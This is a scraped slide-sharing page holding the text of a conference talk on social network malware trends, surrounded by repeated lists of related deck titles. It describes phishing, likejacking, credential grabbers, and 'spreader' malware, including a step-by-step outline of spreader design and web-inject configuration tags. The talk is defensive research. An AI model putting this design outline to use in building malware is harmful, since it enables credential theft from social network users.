Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
Aditya K Sood
 

More from Aditya K Sood (20)

Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and Defences
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 

Recently uploaded

FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 

Emerging Trends in Online Social Networks Malware

  • 1.
  • 2. $WHOAMI Aditya K Sood  Senior Consultant at IOActive: http://ioactive.com/  Others  Worked previously for Armorize, Coseinc and KPMG  Active Speaker at Security conferences  Written Content – IEEE Magazine/ Virus Bulletin/ ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NESE|CFS  Personal Website:  LinkedIn : http://www.linkedin.com/in/adityaks  Website: http://www.secniche.org  Blog: http://secniche.blogspot.com Coordinated Research  Rohit Bansal, Cyber Security Division, PMO INDIA  Dr. Richard J Enbody, Associate Professor, Michigan State University About IOActive Established in 1998, IOActive is an industry leader that offers comprehensive computer security services with specializations in smart grid technologies, software assurance, and compliance. Boasting a well-rounded and diverse clientele, IOActive works with a majority of Global 500 companies including power and utility, game, hardware, retail, financial, media, travel, aerospace, healthcare, high-tech, social networking, and software development organizations.
  • 3. WHOAMI !  The points presented in this talk is completely based on the independent research and does not relate to any of my previous or present employer.  A number of images have been taken from different resources (Sophos, etc.) and others collected during real time analysis  Phishing emails, spam messages, rogue tweets, etc.  Reverse engineering snippets of malware  The demos (videos) are built using compromised malware and real time analysis of different attacks Disclaimer
  • 4. WHOAMI !  A malicious link is served on OSNs  Users follow that link and gets infected with malware Question – Who is responsible?  OSN Vendors for serving that link  Users for following that link  Browsers for getting exploited  Third-party plugins (Java, Adobe, etc.) for inherent vulnerabilities  Anti-virus vendors for not detecting the malware  IPS/IDS for failing to detect the data exfiltration Social Networks – Malware Paradigm !
  • 6. Conduct operations in a deceptive manner Steal identities and sensitive information Breach privacy Harness the power of inherent design of OSNs Exploit the built-in design model to trigger attacks Automated in nature OSN Malware : Features
  • 7. Phishing/Spams OSN Scams LikeJacking/ClickJacking Rogue Applications and Profiles (Facebook, Twitter etc.) Sponsored Advertisements and Malvertisements Worms Socioware Emerging Trends : History to Now…
  • 8.  OSNs User Base  Facebook  1.05 Billion  Refer: Facebook quarterly earning – Q-4  http://www.scribd.com/doc/123034877/Facebook-Q4-2012-Investor-Slide-Deck Users are the Assets !
  • 9. WHOAMI ! OSNs User Base  Twitter – 465 Million and reached 500 Million recently  Refer: http://blog.sironaconsulting.com Users are the Assets !
  • 10.  Barracuda Study (2012)  - http://www.barracudalabs.com/fbinfographic/ Analytics !
  • 11. Chain Exploitation—Social Networks Malware  - http://www.isaca.org/Journal/Past-Issues/2011/Volume-1/Pages/Chain- Exploitation-Social-Networks-Malware.aspx OSN Chain Infection !
  • 12. WHOAMI ! Online Social Network Malware - Trends
  • 13. WHOAMI ! Phishing  Old school tactic but amazingly, it still works  Brand name manipulation and social engineering  Exploits ignorance and doubt among OSN users  Extensively used for conducting drive-by-download attacks Trend (1) – Phishing (Facebook)
  • 14. WHOAMI ! Trend (1) – Phishing (Twitter)
  • 15. WHOAMI !  Used in Surveys Scams  URL shortener services are very fruitful  Hiding targets  Serving exploits  Redirections on the fly Trend (1) – Spamming (Twitter)
  • 16. WHOAMI !  Illegitimate surveys and polls  Spreading malware  Stealing users information Trend (2) – Scams
  • 17. WHOAMI ! Note: A number of fake facebook profiles even exist for more than a year. Trend (3) – Fake Profiles
  • 18. WHOAMI ! Trend (4) – Malicious Applications
  • 19. WHOAMI ! Trend (5) – Malvertisement
  • 20. WHOAMI ! Koobface (2009-2010)  Inject malicious content in wall posts. Hoax warnings  Sending emails to inboxes of the registered Facebook’s users  Chain infection to distribute koobface malware to a large set of users  Also used stolen Facebook credentials for malicious purposes Likejacking Worm (2010 -2012)  Injecting malicious links  To raise ratings by triggering unauthorized likes Trend (6) – Worms
  • 21. WHOAMI ! Lily Jade (2012)  Exploits Crossrider web API to build plugin to attack different browsers  Uses jquery to send malicious messages Ramnit Worm (2010 - 2012)  Stolen Facebook accounts’ credentials are used to deliver malicious messages through compromised accounts Trend (6) – Worms (cont…)
  • 22. WHOAMI !  Injecting malicious links with likes  Manipulating the implementation of like functionality  Very effective in tricking users to follow the likes  Earlier, used to spread malware but now:  It has become a legitimate business model. Amazing !  For $5, one can get a number of likes ! Trend (7) – Likejacking/ Clickjacking
  • 23. WHOAMI !  This demo shows how LikeJacking was conducted earlier to trigger infections in Facebook  It worked when Facebook did not implement any confirmation button  The newly deployed code actually restricts the active implementation of this attack, but it is not the complete solution.  A new variant of LikeJacking code can be expected in the near future. LikeJacking/Clickjacking Demo (Facebook)
  • 24. WHOAMI !  Stealing OSN specific user credentials  Hooks browser to capture all the POST request used for submitting forms  HTTP POST requests carry accounts credentials  OSN specific account credentials are used earlier for building worms  Example: Koobface  Details on Form-grabbing technique:  http://www.virusbtn.com/virusbulletin/archive/2011/11/vb201111- form-grabbing Trend (8) – Identity Stealing (Grabbers)
  • 25. WHOAMI !  A bot having built-in functionality to capture OSN data is installed in the testing environment  Facebook website is opened and credentials are provided  The bot steals the user credentials OSN Grabber (Demo)
  • 26.  Malware targeting OSN from end user machines  Malware exploiting OSNs functionality in an automated manner  Virtually, turns your friends into frenmies  Exploit users by compromising  Identity  Privacy  Completely deceptive in nature Socioware Online Social Networks Malware Trend (9) - Socioware
  • 27. WHOAMI ! Socioware  A class of malware explicitly use to spread infections across different OSNs (Facebook, Twitter, etc.)  Primarily developed as built-in components of bots.  Named as SPREADERS in the underground economy  Explicitly used for building OSN worms  Subverts capabilities of OSNs to distribute malware to a large sections of users How ?  Based on Man-in-the-Browser (MitB) paradigm  Triggering infections from already infected machines  Browsers are hooked and OSN web pages are injected  Exploit trust model that exists between users Trend (9) – Inside Socioware
  • 28. Understanding Socioware – Targeting Facebook Online Chat
  • 29. WHOAMI ! Facebook Chat – Infections !
  • 30.  Creating malicious Facebook application and embedding Java applet that triggers drive-by-download to install spreader  Using exiting botnet to upload infected machines with spreaders  Pay-per infection (PPI) with Browser exploit Packs (BEPs) to infect websites to distribute spreaders  Using USB devices to distribute spreaders physically Spreaders – Distribution !
  • 31.  Executable (Injection Engine) : The primary logic file that spreads malicious messages  Status Notification Component: The executable updates about the status of the injection (success/failure)  Link Storage Component: It stores the different injection ( URLs) to be injected by the executable  Time Interval Component: A logic which decides when to inject the malicious link based on the timing Spreaders – Components !
  • 32.  Step 1 - Installed in the end users’ machines  Step 2 – Hooks browser libraries and controls HTTP communication channel  Step 3 – Remains dormant and starts monitoring engine to detect OSN surfing through browsers  Step 4 - On successful detection, triggers internal logic to find pattern in the web page  Step 5 – Read the malicious message from file (or internally) for injection  Step 6 – Triggers injection and notify the state (success or failure to C&C)  Step 7 – Deactivates itself for a few minutes and starts infecting again Spreaders – Internal Design
  • 33. WHOAMI !  Spreader is installed in the controlled virtual environment  Facebook website is opened and credentials are provided  Facebook chat is activated to send messages to friends  Spreader injects malicious messages after a given time interval Spreaders Demo
  • 34. WHOAMI !  Automated way to inject unauthorized content in HTTP responses  Technique works as:  Hijacking the communication channel of browsers  Manipulating the low level HTTP protocol libraries used by browsers  Primarily aimed for: ─ Stealing information from banking websites on end user machines Socioware - Universal Web Injects
  • 35. WHOAMI !  set_url [target webpage URL] * GP  Setting the target web page to inject  For all HTTP requests G = GET & P=POST  data_before/ data_end tag  Setting the required data in the web page before injected content  data_inject/ data_end tag  Data to inject in the web page  data_before/ data_end tag  Setting the required data in the web page after the injected content Socioware - Universal Web Injects
  • 36. WHOAMI ! Socioware - Universal Web Injects
  • 37. WHOAMI ! Immune System  Users feedback on the channel that is used by malware as a launchpad  Based on message classifier which identify users as infected with malware when the classifier marked messages as shady in collaboration with feedback provided by the users' friends  User marking in conjunction with URL characteristics and features  Refer: http://research.microsoft.com/en-us/projects/ldg/a10-stein.pdf Traffic Analyzer  Crawling every possible URL  Resolving DNS entries and checking against blacklists  It requires resolving of URL shortners too Facebook Built-in Protection
  • 38. WHOAMI ! Why end users and client side software are still the priority targets? Point to Ponder !
  • 39. WHOAMI !  OSN will remain the centralized target for distributing malware  Trend of automated infections against OSN will continue  Significant increase in socioware based crimeware services  Possibility of advanced likejacking attacks  Socioware attacking mobile platforms Future !
  • 41.  To all my team members  IOActive for its continuous support  Secure 360 team for giving me an opportunity to speak Thanks !